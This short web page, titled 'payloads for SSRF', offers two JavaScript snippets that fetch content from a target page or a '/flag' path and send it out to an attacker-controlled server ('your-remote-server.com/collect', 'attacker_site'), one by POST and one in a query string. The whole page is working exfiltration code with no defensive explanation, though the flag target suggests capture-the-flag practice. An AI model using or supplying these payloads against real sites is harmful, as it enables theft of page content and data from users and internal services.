Skip to content

payloads for SSRF

Write a javascript payload to fetch the content of another page then send them to another web server

fetch('http://target-page.com')
  .then(res => res.text())
  .then(data => fetch('http://your-remote-server.com/collect', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ data })
  }));

fetch("/flag")
  .then((r) => r.text())
  .then((t) => fetch(`https://attacker_site/?c=${encodeURIComponent(t)}`));